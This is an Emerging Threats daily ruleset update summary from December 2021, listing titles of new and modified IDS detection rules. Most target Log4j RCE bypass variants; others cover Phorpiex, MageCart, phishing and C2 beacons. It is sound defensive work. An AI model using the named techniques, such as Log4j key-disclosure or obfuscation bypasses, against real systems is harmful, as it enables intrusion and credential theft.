Daily Ruleset Update Summary 2021/12/20

Daily Ruleset Update Summary

[***] Summary: [***]

44 new OPEN, 46 new PRO (44 + 2). More log4j, Phorpiex and Phish.

Thanks @MBThreatIntel and @_CPResearch_

Please share issues, feedback, and requests at
https://feedback.emergingthreats.net/feedback

[+++] Added rules: [+++]

Open:

2034769 - ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via
LDAPv3 Response M2 (attack_response.rules)
2034770 - ET POLICY JavaClass Returned Via Anonymous Outbound LDAPv3
Bind Request (policy.rules)
2034771 - ET POLICY Successful Non-Anonymous LDAPv3 Bind Request
Outbound (policy.rules)
2034772 - ET POLICY JavaClass Returned Via Non-Anonymous Outbound
LDAPv3 Bind Request (policy.rules)
2034773 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034774 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034775 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034776 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034777 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034778 - ET TROJAN Phorpiex Botnet Downloader Activity (GET) (trojan.rules)
2034779 - ET TROJAN MageCart Skimmer Domain in DNS Lookup
(bootstrap2 .xyz) (trojan.rules)
2034780 - ET EXPLOIT Oracle Coherence Deserialization RCE
(CVE-2020-2555) (exploit.rules)
2034781 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP
Bypass M1 (Outbound) (CVE-2021-44228) (exploit.rules)
2034782 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP
Bypass M1 (Outbound) (CVE-2021-44228) (exploit.rules)
2034783 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(Outbound) (CVE-2021-44228) (info.rules)
2034784 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(Outbound) (CVE-2021-44228) (info.rules)
2034785 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
upper Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034786 - ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034787 - ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (Outbound)
(CVE-2021-44228) (exploit.rules)
2034788 - ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (Outbound)
(CVE-2021-44228) (exploit.rules)
2034789 - ET EXPLOIT Possible Apache log4j RCE Attempt (udp corba)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034790 - ET EXPLOIT Possible Apache log4j RCE Attempt (tcp corba)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034791 - ET EXPLOIT Possible Apache log4j RCE Attempt (udp nds)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034792 - ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nds)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034793 - ET EXPLOIT Possible Apache log4j RCE Attempt (udp nis)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034794 - ET EXPLOIT Possible Apache log4j RCE Attempt (tcp nis)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034795 - ET EXPLOIT Apache log4j RCE Attempt - Nested upper (udp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034796 - ET EXPLOIT Apache log4j RCE Attempt - Nested upper (tcp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034797 - ET EXPLOIT Apache log4j RCE Attempt - Nested lower (udp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034798 - ET EXPLOIT Apache log4j RCE Attempt - Nested lower (tcp)
(Outbound) (CVE-2021-44228) (exploit.rules)
2034799 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP
Bypass M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034800 - ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP
Bypass M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034801 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
upper Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034802 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
lower Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034803 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
lower Bypass (Outbound) (CVE-2021-44228) (info.rules)
2034804 - ET EXPLOIT Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed (Outbound) (CVE-2021-44228) (exploit.rules)
2034805 - ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed M2 (Outbound) (CVE-2021-44228) (exploit.rules)
2034806 - ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/17
Obfuscation Observed (Outbound) (CVE-2021-44228) (exploit.rules)
2034807 - ET EXPLOIT Apache log4j RCE Attempt - AWS Access Key
Disclosure (Outbound) (CVE-2021-44228) (exploit.rules)
2034808 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(lower TCP Bypass) (CVE-2021-44228) (info.rules)
2034809 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(lower UDP Bypass) (CVE-2021-44228) (info.rules)
2034810 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(upper TCP Bypass) (CVE-2021-44228) (info.rules)
2034811 - ET INFO Possible Apache log4j RCE Attempt - Any Protocol
(upper UDP Bypass) (CVE-2021-44228) (info.rules)
2034812 - ET POLICY Non-Anonymous LDAPv3 Bind Request Outbound (policy.rules)

Pro:

2850706 - ETPRO CURRENT_EVENTS Successful Generic Phish 2021-12-20
(current_events.rules)
2850707 - ETPRO CURRENT_EVENTS Successful Generic Phish 2021-12-20
(current_events.rules)

[///] Modified active rules: [///]

2032936 - ET TROJAN Suspected Sliver DNS CnC (trojan.rules)
2034704 - ET POLICY Anonymous LDAPv3 Bind Request Outbound (policy.rules)
2034705 - ET POLICY Successful Anonymous LDAPv3 Bind Request
Outbound (policy.rules)
2034722 - ET ATTACK_RESPONSE Possible CVE-2021-44228 Payload via
LDAPv3 Response (attack_response.rules)
2808312 - ETPRO TROJAN Win32/Meac.A CnC (OUTBOUND) (trojan.rules)
2811176 - ETPRO TROJAN Luminosity Link RAT CnC Beacon Outbound (trojan.rules)
2835635 - ETPRO TROJAN Possible Kimsuky Phishing or Malware DNS
Lookup (trojan.rules)
2848776 - ETPRO TROJAN Sliver Framework HTTP C2 sessionInit (trojan.rules)
2850579 - ETPRO TROJAN Emotet CnC Beacon (trojan.rules)

Date:

Monday, December 20, 2021

Summary title:

44 new OPEN, 46 new PRO (44 + 2). More log4j, Phorpiex and Phish.